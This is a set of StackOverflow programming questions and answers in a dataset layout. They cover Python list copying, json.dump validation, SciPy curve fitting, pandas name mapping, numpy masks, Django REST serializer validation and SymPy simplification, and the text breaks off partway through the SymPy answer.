copy() function: initList = ["a", "b", "c"] print(id(initList)) copiedList = initList.copy() print(id(copiedList))
How do Assignment Operators and Lists Work? - Python
The assignment operator appears to work differently for lists than it does for integers: >>> list1 = [1,2,3,4,5] >>> newlist1 = list1 >>> print(id(list1)) 140282759536448 >>> print(id(newlist1)) 140282759536448 >>> newlist1.append(6) >>> print(id(newlist1)) 140282759536448 >>> print(list1) [1, 2, 3, 4, 5, 6] >>> print(newlist1) [1, 2, 3, 4, 5, 6] The Assignment Operator works in a similar way with integers: >>> int1 = 1 >>> newint1 = int1 >>> print(id(int1)) 140282988331248 >>> print(id(newint1)) 140282988331248 But modifying one of the integers creates a new ID: >>> newint1 = newint1 + 1 >>> print(id(newint1)) 140282988331280 >>> print(id(int1)) 140282988331248 Why does modifying a list not create a new ID? As well, how would you create a new ID for a list?
[ "You should use newlist1 = list1.copy() because when you do newlist1 = list1 you are not creating new list you are referencing the same list\n", "In Python, when you assign a list to a new variable, you will only pass the address of the list to it.\nThat is why the id()function return the same value.\nIf you want to actually copy the list you have to use the copy() function:\ninitList = [\"a\", \"b\", \"c\"]\nprint(id(initList))\n\ncopiedList = initList.copy()\nprint(id(copiedList))\n\n" ]
[ 0, 0 ]
[]
[]
[ "assignment_operator", "integer", "list", "python", "python_3.x" ]
stackoverflow_0074575436_assignment_operator_integer_list_python_python_3.x.txt
Q: Displaying better error than TypeException when doing JSON.dump on Python When Python json.dump fails to serialise value, it does not tell what was the invalid key or where it was located. This makes json.dump useless when trying to locate data errors in large JSON objects. Is it possible to improve json.dump TypeError error messages? A: One can pre-validate the data before passing it to json.dump. json.dump encoder itself does not pass data locatin information around, making it hard to use it for the task. Here is a Python code that Raises nested custom exceptions to locate any keys with bad values Contains some useful checks and patterns for common Python libraries which might be pitfalls on naive use os json.dump() Call validate_nested_state_dict() before passing the data to json.dump. import datetime from decimal import Decimal from enum import Enum from types import NoneType from typing import Any import pandas as pd import numpy as np class BadStateData(Exception): """Having something we do not support in the state.""" #: Types we know we can safely pass to JSON serialisation ALLOWED_VALUE_TYPES = ( dict, list, float, int, str, NoneType, Enum, # Supported by dadtaclasses_json datetime.datetime, # Supported by dadtaclasses_json Decimal, # Supported by dadtaclasses_json ) #: We especially do not want to see these in serialisation. #: We need to do negative test, because Pandas types to some base class #: magic. BAD_VALUE_TYPES = ( np.float32, pd.Timedelta, pd.Timestamp, ) def validate_state_value(name: str | int, val: Any): if not isinstance(val, ALLOWED_VALUE_TYPES): raise BadStateData(f"Bad value {name}: {val} ({type(val)}") if isinstance(val, BAD_VALUE_TYPES): raise BadStateData(f"Bad value {name}: {val} ({type(val)}") def walk(name, val): """Raise hierarchical exceptions to locate the bad key-value pair in nested data.""" try: if isinstance(val, dict): for k, v in val.items(): walk(k, v) elif isinstance(val, list): for idx, val in enumerate(val): walk(idx, val) else: validate_state_value(name, val) except BadStateData as e: raise BadStateData(f"Key {name} contained bad value") from e def validate_nested_state_dict(d: dict | list | object): walk("state", d)
Displaying better error than TypeException when doing JSON.dump on Python
When Python json.dump fails to serialise value, it does not tell what was the invalid key or where it was located. This makes json.dump useless when trying to locate data errors in large JSON objects. Is it possible to improve json.dump TypeError error messages?
[ "One can pre-validate the data before passing it to json.dump. json.dump encoder itself does not pass data locatin information around, making it hard to use it for the task.\nHere is a Python code that\n\nRaises nested custom exceptions to locate any keys with bad values\n\nContains some useful checks and patterns for common Python libraries which might be pitfalls on naive use os json.dump()\n\n\nCall validate_nested_state_dict() before passing the data to json.dump.\nimport datetime\nfrom decimal import Decimal\nfrom enum import Enum\nfrom types import NoneType\nfrom typing import Any\n\nimport pandas as pd\nimport numpy as np\n\n\nclass BadStateData(Exception):\n \"\"\"Having something we do not support in the state.\"\"\"\n\n\n#: Types we know we can safely pass to JSON serialisation\nALLOWED_VALUE_TYPES = (\n dict,\n list,\n float,\n int,\n str,\n NoneType,\n Enum, # Supported by dadtaclasses_json\n datetime.datetime, # Supported by dadtaclasses_json\n Decimal, # Supported by dadtaclasses_json\n)\n\n#: We especially do not want to see these in serialisation.\n#: We need to do negative test, because Pandas types to some base class\n#: magic.\nBAD_VALUE_TYPES = (\n np.float32,\n pd.Timedelta,\n pd.Timestamp,\n)\n\ndef validate_state_value(name: str | int, val: Any):\n if not isinstance(val, ALLOWED_VALUE_TYPES):\n raise BadStateData(f\"Bad value {name}: {val} ({type(val)}\")\n\n if isinstance(val, BAD_VALUE_TYPES):\n raise BadStateData(f\"Bad value {name}: {val} ({type(val)}\")\n\n\ndef walk(name, val):\n \"\"\"Raise hierarchical exceptions to locate the bad key-value pair in nested data.\"\"\"\n try:\n if isinstance(val, dict):\n for k, v in val.items():\n walk(k, v)\n elif isinstance(val, list):\n for idx, val in enumerate(val):\n walk(idx, val)\n else:\n validate_state_value(name, val)\n except BadStateData as e:\n raise BadStateData(f\"Key {name} contained bad value\") from e\n\n\ndef validate_nested_state_dict(d: dict | list | object):\n walk(\"state\", d)\n\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074575566_python.txt
Q: Python SciPy is 'RuntimeWarning: invalid value encountered in sqrt' bad? I wanted to fit some astronomical data (made up data mostly), using a gaussian function on a line. I took the residual of the gaussian+line function on x-axis so I only had to fit the gaussian. Here's how I defined it: def gaussian_only(x, amp, mean, std): curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) ) * np.sqrt(std)/np.sqrt(std) * np.sqrt(amp)/np.sqrt(amp) * np.sqrt(mean)/np.sqrt(mean) return curve I multiplied and divided by sqrt of the values as the curvefit (defined in another function) was returning me negative values for standard deviation, mean and amplitude. So this kind of forced it to return me only positive values. Here's the function: def gaussian_only_fit(arr, curve_residual, initial_guess): amp, mean, std = initial_guess fit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std]) return fit Is there something "wrong" or "bad" with what I did? EDIT: I did try "bounds" argument for curve_fit. It gives me worse fit values than before. A: curve_fit() probably attempted to evaluate your function with a negative value of std. You can use the bounds argument of curve_fit() to avoid this. You should probably also avoid fitting with 0 standard deviation, so set a very small positive value as the lower bound: fit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std], bounds=([0, -inf, 1e-15],[inf, inf, inf])) Given your application, I've also set the minimum value for amp to 0 here. Depending on what the data represents you might also want to set limits on mean. Note the bounds argument was only introduced in scipy version 0.17. If you are using an older version of scipy, you could use a variable transformation like def gaussian_only(x, log_amp, log_mean, log_std): amp = np.exp(log_amp) # Guarantees 0 < amp < infinity mean = np.exp(log_mean) std = np.exp(log_std) curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) ) return curve Of course you will have to adjust your starting guess to account for the transformation.
Python SciPy is 'RuntimeWarning: invalid value encountered in sqrt' bad?
I wanted to fit some astronomical data (made up data mostly), using a gaussian function on a line. I took the residual of the gaussian+line function on x-axis so I only had to fit the gaussian. Here's how I defined it: def gaussian_only(x, amp, mean, std): curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) ) * np.sqrt(std)/np.sqrt(std) * np.sqrt(amp)/np.sqrt(amp) * np.sqrt(mean)/np.sqrt(mean) return curve I multiplied and divided by sqrt of the values as the curvefit (defined in another function) was returning me negative values for standard deviation, mean and amplitude. So this kind of forced it to return me only positive values. Here's the function: def gaussian_only_fit(arr, curve_residual, initial_guess): amp, mean, std = initial_guess fit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std]) return fit Is there something "wrong" or "bad" with what I did? EDIT: I did try "bounds" argument for curve_fit. It gives me worse fit values than before.
[ "curve_fit() probably attempted to evaluate your function with a negative value of std.\nYou can use the bounds argument of curve_fit() to avoid this. You should probably also avoid fitting with 0 standard deviation, so set a very small positive value as the lower bound:\nfit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std], bounds=([0, -inf, 1e-15],[inf, inf, inf]))\n\nGiven your application, I've also set the minimum value for amp to 0 here. Depending on what the data represents you might also want to set limits on mean.\nNote the bounds argument was only introduced in scipy version 0.17. If you are using an older version of scipy, you could use a variable transformation like\ndef gaussian_only(x, log_amp, log_mean, log_std):\n amp = np.exp(log_amp) # Guarantees 0 < amp < infinity\n mean = np.exp(log_mean)\n std = np.exp(log_std)\n curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) )\n return curve\n\nOf course you will have to adjust your starting guess to account for the transformation.\n" ]
[ 1 ]
[]
[]
[ "curve_fitting", "python", "scipy" ]
stackoverflow_0074575480_curve_fitting_python_scipy.txt
Q: Need to find and replace/correct list from another df column I have a list let suppose F = [Jonii, Max, anna, xyz, etc..] and df which contains 2 column- Name and Corrected_Name. df I need to search each string from list into df[Name] and replace it with df[Corrected_Name]. For eg. in above, code will search list in df[Name] and if found which is "Jonii" then replace it with "Jon" which is from df[Corrected_Name]. So finally output will be f = [Jon, Max, anna, xyz, etc..] Thanks in advance!! I am learner so pls ignore writing mistakes. A: You can use a simple dict to do that: d = {k: v for k, v in zip(df['Name'], df['Corrected_Name'])} f = [d.get(k, k) for k in F] Reproducible example df = pd.DataFrame([['a', 'b'], ['b', 'c'], ['foo', 'bar']], columns=['Name', 'Corrected_Name']) F = ['a', 'aa', 'b', 'hello', 'foo'] # code above >>> f ['b', 'aa', 'c', 'hello', 'bar'] A: Maybe like this (Admittedly this is not the best way to do it): import pandas as pd df = pd.DataFrame({"Name": ["Johnii", "Tommi", "Marc"], "CorrectedName": ["John", "Tom", "Mark"]}) names = ["Johnii", "Elizabeth", "Arthur", "Tommi"] output = [] for name in names: updated_value = [cn for n, cn in zip(df['Name'], df['CorrectedName']) if n == name] output.append(updated_value[0] if updated_value else name) print(output)
Need to find and replace/correct list from another df column
I have a list let suppose F = [Jonii, Max, anna, xyz, etc..] and df which contains 2 column- Name and Corrected_Name. df I need to search each string from list into df[Name] and replace it with df[Corrected_Name]. For eg. in above, code will search list in df[Name] and if found which is "Jonii" then replace it with "Jon" which is from df[Corrected_Name]. So finally output will be f = [Jon, Max, anna, xyz, etc..] Thanks in advance!! I am learner so pls ignore writing mistakes.
[ "You can use a simple dict to do that:\nd = {k: v for k, v in zip(df['Name'], df['Corrected_Name'])}\nf = [d.get(k, k) for k in F]\n\nReproducible example\ndf = pd.DataFrame([['a', 'b'], ['b', 'c'], ['foo', 'bar']], columns=['Name', 'Corrected_Name'])\nF = ['a', 'aa', 'b', 'hello', 'foo']\n\n# code above\n\n>>> f\n['b', 'aa', 'c', 'hello', 'bar']\n\n", "Maybe like this (Admittedly this is not the best way to do it):\nimport pandas as pd\n\ndf = pd.DataFrame({\"Name\": [\"Johnii\", \"Tommi\", \"Marc\"], \"CorrectedName\": [\"John\", \"Tom\", \"Mark\"]})\nnames = [\"Johnii\", \"Elizabeth\", \"Arthur\", \"Tommi\"]\n\noutput = []\nfor name in names:\n updated_value = [cn for n, cn in zip(df['Name'], df['CorrectedName']) if n == name]\n output.append(updated_value[0] if updated_value else name)\n\nprint(output)\n\n" ]
[ 1, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575299_pandas_python.txt
Q: How to do a kernel with horizontal stripes fast I wanna do a kernel of zeros and ones. I have a list with pairs of heights (e.g. [[191.0, 243.0], [578.0, 632.0]]. What I want to do is set ones in the kernel on those rows with height between the values of a pair of heights. Example image about what I want to do (in this case 2 pairs, the values above): enter image description here My method makes a double loop but takes minutes to execute. Is there any faster way to do this? Here is the code: mascara = numpy.zeros((height, width),numpy.uint8) #print(mascara) for i in range(height): for j in range(width): #For each element of the kernel (kernel=mascara) indice_parejas = 0 while indice_parejas < numero_de_parejas: #indice_parejas: index that indicates the pair we are checking #print(i,j) #numero_de_parejas: how many pairs we have if i > vector_mascara[indice_parejas][0] and i < vector_mascara[indice_parejas][1]: #If it is between a pair mascara[i][j] = 1 break #we don't have to check the others pairs because we know it is in this pair (get out of the loop) else: indice_parejas = indice_parejas + 1 A: IIUC, it is quite simple: for h0, h1 in hpairs: mask[h0:h1, :] = 1 Reproducible example w, h = 8, 4 mask = np.zeros((w, h), dtype=np.uint8) hpairs = [ [1,3], [5,6], ] for h0, h1 in hpairs: mask[h0:h1, :] = 1 >>> mask array([[0, 0, 0, 0], [1, 1, 1, 1], [1, 1, 1, 1], [0, 0, 0, 0], [0, 0, 0, 0], [1, 1, 1, 1], [0, 0, 0, 0], [0, 0, 0, 0]], dtype=uint8)
How to do a kernel with horizontal stripes fast
I wanna do a kernel of zeros and ones. I have a list with pairs of heights (e.g. [[191.0, 243.0], [578.0, 632.0]]. What I want to do is set ones in the kernel on those rows with height between the values of a pair of heights. Example image about what I want to do (in this case 2 pairs, the values above): enter image description here My method makes a double loop but takes minutes to execute. Is there any faster way to do this? Here is the code: mascara = numpy.zeros((height, width),numpy.uint8) #print(mascara) for i in range(height): for j in range(width): #For each element of the kernel (kernel=mascara) indice_parejas = 0 while indice_parejas < numero_de_parejas: #indice_parejas: index that indicates the pair we are checking #print(i,j) #numero_de_parejas: how many pairs we have if i > vector_mascara[indice_parejas][0] and i < vector_mascara[indice_parejas][1]: #If it is between a pair mascara[i][j] = 1 break #we don't have to check the others pairs because we know it is in this pair (get out of the loop) else: indice_parejas = indice_parejas + 1
[ "IIUC, it is quite simple:\nfor h0, h1 in hpairs:\n mask[h0:h1, :] = 1\n\nReproducible example\nw, h = 8, 4\nmask = np.zeros((w, h), dtype=np.uint8)\n\nhpairs = [\n [1,3],\n [5,6],\n]\n\nfor h0, h1 in hpairs:\n mask[h0:h1, :] = 1\n\n>>> mask\narray([[0, 0, 0, 0],\n [1, 1, 1, 1],\n [1, 1, 1, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [1, 1, 1, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0]], dtype=uint8)\n\n" ]
[ 0 ]
[]
[]
[ "numpy", "python" ]
stackoverflow_0074573234_numpy_python.txt
Q: Level-field validation in django rest framework 3.1 - access to the old value Before updating object the title field is validated. How to access data of serialized object in order to compare value with older value of this object? from rest_framework import serializers class BlogPostSerializer(serializers.Serializer): title = serializers.CharField(max_length=100) content = serializers.CharField() def validate_title(self, value): """ Check that the blog post is about Django. """ if 'django' not in value.lower(): raise serializers.ValidationError("Blog post is not about Django") return value A: You can do this: def validate_title(self, value): """ Check that the title has not changed. """ if self.instance and value != self.instance.title raise serializers.ValidationError("Title of a blog post cannot be edited ") return value In case of update operations, you will have access to the old object as self.instance. Then you can use that to perform your check. A: You can get the old value of the field from the serializer context. To do this, use validation class with parameter requires_context = True. The __call__ method will then be called with the serializer_field or serializer as an additional argument (manual). from rest_framework import serializers from rest_framework.exceptions import ValidationError class ChangeValidator: requires_context = True def __call__(self, value, serializer_field): instance = getattr(serializer_field.parent, 'instance', None) if instance and value == instance.title raise ValidationError("Title of a blog must be changed") class BlogPostSerializer(serializers.Serializer): title = serializers.CharField(max_length=100, validators=[ChangeValidator()]) content = serializers.CharField()
Level-field validation in django rest framework 3.1 - access to the old value
Before updating object the title field is validated. How to access data of serialized object in order to compare value with older value of this object? from rest_framework import serializers class BlogPostSerializer(serializers.Serializer): title = serializers.CharField(max_length=100) content = serializers.CharField() def validate_title(self, value): """ Check that the blog post is about Django. """ if 'django' not in value.lower(): raise serializers.ValidationError("Blog post is not about Django") return value
[ "You can do this:\ndef validate_title(self, value):\n \"\"\"\n Check that the title has not changed.\n \"\"\"\n if self.instance and value != self.instance.title\n raise serializers.ValidationError(\"Title of a blog post cannot be edited \")\n return value\n\nIn case of update operations, you will have access to the old object as self.instance. Then you can use that to perform your check.\n", "You can get the old value of the field from the serializer context. To do this, use validation class with parameter requires_context = True. The __call__ method will then be called with the serializer_field or serializer as an additional argument (manual).\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nclass ChangeValidator:\n requires_context = True\n\n def __call__(self, value, serializer_field):\n instance = getattr(serializer_field.parent, 'instance', None)\n if instance and value == instance.title\n raise ValidationError(\"Title of a blog must be changed\")\n\n\nclass BlogPostSerializer(serializers.Serializer):\n title = serializers.CharField(max_length=100, validators=[ChangeValidator()])\n content = serializers.CharField()\n\n" ]
[ 2, 0 ]
[]
[]
[ "django", "django_rest_framework", "python", "serialization" ]
stackoverflow_0031089407_django_django_rest_framework_python_serialization.txt
Q: Refined manipulation of sympy expressions I am trying to work with sympy and work with manipulation of expressions. import sympy as sym from sympy.abc import t x0,v0 = sym.symbols("x0 v0 ", real=True) wn = sym.symbols("omega_n", positive = True, real=True) z = sym.symbols("zeta", positive = True, real=True) x = sym.Function('x') Dx = sym.Derivative(x(t), t) Dx2= sym.Derivative(x(t), t,2) res = sym.dsolve(Dx2 +2*z*wn*Dx+ wn**2*x(t), x(t), ics = { x(0): x0, Dx.subs(t,0):v0}) The above yields the following expression The part circled in red can be further simplified to , however I can't figure out how is it possible to simplify selected portions of the expression. If I take a simpler exampler wn*x0*z**2/(2*wn*z**2-2*wn) then its possible to cancel out the terms with simplify(), but I could find anywhere some good documentation on how to work and substitute parts of the equation. Another similar issue is with the term , which I would like to transform to A: One way is to use pattern matching. Note that your circled term is a multiplication, containing z**2 (a power operation). # search the expression tree and select all multiplications # containing a power with exponent 2 w = sym.Wild("w", properties=[ lambda e: e.is_Mul and any(t.is_Pow and t.exp == 2 for t in e.args) ]) t = list(res.find(w))[0] print(t) # out: omega_n*x0*zeta**2/(2*omega_n*zeta**2 - 2*omega_n) # Perform the simplification and substitution res = res.subs(t, t.simplify()) Now let's look for the second term in your question: # loop over each exponential term and apply a # powsimp to its argument. for t in res.find(sym.exp): res = res.subs(t, sym.exp(t.args[0].powsimp())) print(res) Edit: similarly, you can apply the same technique to simplify the other square roots on your expression. A: First here is the rhs of your equation: In [58]: res.rhs Out[58]: ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ ωₙ⋅x₀⋅ζ ωₙ⋅x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ωₙ⋅x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜────────────── + ─────────────────────────── - ────────────── + ──────────────────────⎟⋅ℯ ⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 2 ⎟ ⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎝2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ ⎠ For the first part of your question what we can do is collect on wn for the rhs of the equation. This has the effect of cancelling out the wn in the terms where they can cancel: In [45]: res.rhs.collect(wn) Out[45]: ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜──────── + ──────────────────────── - ──────── + ──────────────────────⎟⋅ℯ ⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ ⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ Now we see there are various powers that could be simplified by combining them. In general sqrt(z-1)*sqrt(z+1) is not necessarily equal to sqrt(z**2 - 1) but the assumption that z is positive means that they are equal. In that case powsimp should combine those powers: In [46]: res.rhs.collect(wn).powsimp() Out[46]: ⎛ ________ ________⎞ ⎛ _______ _______⎞ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎛ _______ _______⎞ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ ⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ ⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ ⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ Here powsimp didn't apply to the exponents so we need to use deep=True to tell it to look deeper for things to combine: In [47]: res.rhs.collect(wn).powsimp(deep=True) Out[47]: ⎛ ________⎞ ⎛ ________ ________⎞ ⎛ ________⎞ ⎜ ╱ 2 ⎟ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎜ ╱ 2 ⎟ ⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ ⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ ⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ ⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ There are common factors like 2 that we can extract with factor_terms: In [48]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)) Out[48]: ⎛ ________⎞ ⎛ ________⎞ ⎜ ╱ 2 ⎟ ⎛ 2 ⎞ ⎜ ╱ 2 ⎟ ⎛ x₀⋅ζ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ x₀⋅ζ x₀ v₀ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜- ─────────── + x₀ - ──────────────⎟⋅ℯ + ⎜────── + ─────────── - ────── + ──────────────⎟⋅ℯ ⎜ ________ ________⎟ ⎜ 2 ________ 2 ________⎟ ⎜ ╱ 2 ╱ 2 ⎟ ⎜ζ - 1 ╱ 2 ζ - 1 ╱ 2 ⎟ ⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 2 Now we can collect on powers of z**2 - 1 to reduce the repeating subexpressions: In [55]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1) Out[55]: ⎛ v₀⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞ ⎜ -x₀⋅ζ - ──⎟ ⎜ ╱ 2 ⎟ ⎜ 2 x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ ωₙ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ - x₀ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜x₀ + ───────────⎟⋅ℯ ⎜────────── + ───────────⎟⋅ℯ ⎜ ________⎟ ⎜ 2 ________⎟ ⎜ ╱ 2 ⎟ ⎜ ζ - 1 ╱ 2 ⎟ ⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ ─────────────────────────────────────────── + ─────────────────────────────────────────────────── 2 2 Finally applying factor_terms to the coefficients of that last collect allows us to cancel the one remaining awkward term and normalise the minus signs: In [56]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1, factor_terms) Out[56]: ⎛ v₀ ⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞ ⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ ωₙ ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠ ⎜x₀ - ───────────⎟⋅ℯ ⎜x₀ + ───────────⎟⋅ℯ ⎜ ________⎟ ⎜ ________⎟ ⎜ ╱ 2 ⎟ ⎜ ╱ 2 ⎟ ⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ ─────────────────────────────────────────── + ─────────────────────────────────────────── 2 2
Refined manipulation of sympy expressions
I am trying to work with sympy and work with manipulation of expressions. import sympy as sym from sympy.abc import t x0,v0 = sym.symbols("x0 v0 ", real=True) wn = sym.symbols("omega_n", positive = True, real=True) z = sym.symbols("zeta", positive = True, real=True) x = sym.Function('x') Dx = sym.Derivative(x(t), t) Dx2= sym.Derivative(x(t), t,2) res = sym.dsolve(Dx2 +2*z*wn*Dx+ wn**2*x(t), x(t), ics = { x(0): x0, Dx.subs(t,0):v0}) The above yields the following expression The part circled in red can be further simplified to , however I can't figure out how is it possible to simplify selected portions of the expression. If I take a simpler exampler wn*x0*z**2/(2*wn*z**2-2*wn) then its possible to cancel out the terms with simplify(), but I could find anywhere some good documentation on how to work and substitute parts of the equation. Another similar issue is with the term , which I would like to transform to
[ "One way is to use pattern matching. Note that your circled term is a multiplication, containing z**2 (a power operation).\n# search the expression tree and select all multiplications\n# containing a power with exponent 2\nw = sym.Wild(\"w\", properties=[\n lambda e: e.is_Mul and any(t.is_Pow and t.exp == 2 for t in e.args)\n])\nt = list(res.find(w))[0]\nprint(t)\n# out: omega_n*x0*zeta**2/(2*omega_n*zeta**2 - 2*omega_n)\n\n# Perform the simplification and substitution\nres = res.subs(t, t.simplify())\n\nNow let's look for the second term in your question:\n# loop over each exponential term and apply a\n# powsimp to its argument.\nfor t in res.find(sym.exp):\n res = res.subs(t, sym.exp(t.args[0].powsimp()))\nprint(res)\n\nEdit: similarly, you can apply the same technique to simplify the other square roots on your expression.\n", "First here is the rhs of your equation:\nIn [58]: res.rhs\nOut[58]: \n ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ ωₙ⋅x₀⋅ζ ωₙ⋅x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ωₙ⋅x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠\n⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜────────────── + ─────────────────────────── - ────────────── + ──────────────────────⎟⋅ℯ \n⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 2 ⎟ \n⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎝2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ 2⋅ωₙ⋅ζ - 2⋅ωₙ ⎠ \n\nFor the first part of your question what we can do is collect on wn for the rhs of the equation. This has the effect of cancelling out the wn in the terms where they can cancel:\nIn [45]: res.rhs.collect(wn)\nOut[45]: \n ⎛ _______ _______⎞ ⎛ 2 _______ _______ _______ _______⎞ ⎛ _______ _______⎞\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 x₀ v₀⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠\n⎜- ───────────────────── + ── - ────────────────────────⎟⋅ℯ + ⎜──────── + ──────────────────────── - ──────── + ──────────────────────⎟⋅ℯ \n⎜ _______ _______ 2 _______ _______⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ \n⎝ 2⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 2⋅ωₙ⋅╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ 